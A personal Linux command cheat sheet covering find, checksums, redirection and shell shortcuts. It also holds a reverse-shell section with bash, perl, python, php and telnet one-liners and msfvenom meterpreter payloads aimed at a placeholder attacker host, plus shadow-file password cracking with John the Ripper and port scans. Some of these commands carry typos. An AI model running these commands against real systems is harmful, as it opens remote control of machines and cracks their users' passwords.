Linux

change default application

  • open file browser, such as pcmanfm, right click the file and select open with.

  • choose the program or shell command, then select some checkbox with label “always open this kind of file ..”

zathura clipboard

  1. in viewer, :code:set selection-clipboard clipboard

  2. in ~/.config/zathura/zathurarc or /etc/zathurarc add the above command

find

  1. link

  2. find . type f -size +10k

  3. find . type f -atime -7

  4. find . -maxdepth 3 -type f

  5. find . -mindepth 2 -type f

  6. find /home -name "*.txt" -o -name "*.pdf"

  7. find . -regex ".*\(\.txt\|\.pdf\)$"

  8. find . -type f -name "*.txt" -delete

  9. find . -type f -perm 777

  10. find . -type f -user root -exec chown tom {} \;

  11. find . -type f -mtime +30 -name "*.log" -exec cp {} old \;

  12. find . -name "*.java"|xargs cat | gerp -v ^$|wc -l

John the Ripper

  1. unshadow /etc/passwd /etc/shadow > test_passwd

  2. john –word-list=path_to_wordlist test_passwd

arp -l

nmap

  1. nmap -Pn -p22,80,111,49780 -A -oN nmap.txt IP

  2. nmap -v -sV IP/sub_net

masscan

  1. masscan -p1-65535,U:1-65535 IP --rate=1000

checksum

  1. echo 'hello world' | md5sum -

  2. echo 'hello world' | sha256sum -

  3. echo 'hello world' | sha512sum -

redirect input/output

1. cmd >&n send output to file descriptor n 1. cmd m>&n send file descriptor m to file descriptor n #. cmd > file 2>1 redirect stderr to stdout, then redict both to file. #. cmd &> file redirect stderr and stdout to file #. cmd >& file redirect stderr and stdout to file #. cmd >& file 0>&1 redicrect stderr, stdout, stdin to file

sudo

  1. echo password | sudo -S comamnd

reverse shell

  1. bash

    • attacker: nc -nvlp 4444

    • target: bash -i >& /dev/tcp/attack_ip/attack_port 0>&1

  2. telnet

    • attacker: nc -nvlp 4444; nc -nvlp 5555

    • target: telnet attack_ip 4444 | /bin/bash | telnet attack_ip 5555

  3. netcat

  4. perl

    • attacker: nc -nvlp 4444

    • target: perl -e 'use Socket;$i="attack_ip";$p=4444;socket(S,PF_INET,SOCK_STEAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">$S");exec("/bin/bash -i");};'

  5. python

  • attacker: nc -nvlp 4444

  • target: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect("attacker_ip",attacker_port);os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i]);'

  1. php

    • attacker: nc -nvlp 4444

    • target: php -r '$sock=fsockopen("attack_ip", attack_port);exec("/bin/bash -i <&3 >&3 2>&3");'

  2. msf

    • php: msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f raw > /root/shell.php

    • windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f exe > /root/hacker.exe

    • linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f elf > /root/shell

    • attacker

      • use exploit/multi/handler

      • set payload windows/meterpreter/reverse_tcp

      • set LHOST attacker_ip

      • set LPORT attacker_port

      • run # or exploit

  3. exec

    • attacker: nc -nvlp 4444

    • target: exec 5<>/dev/tcp/attacker_ip/attacker_port; cat <&5 | while read line; do $line 2>&5 >&5; done

terminal shorthand

  • C-u: cut from cursor to line head

  • C-k: cut from cursor to line end

  • C-w: cut from cursor to word head

  • A-d: cut from cursor to word end

  • C-y: paste the content that was cut before

  • C-a: move cursor to line head

  • C-e: move cursor to line end

  • C-b/C-f: move cursor backword/forword a character

  • A-b/A-f: move cursor backword/forword a word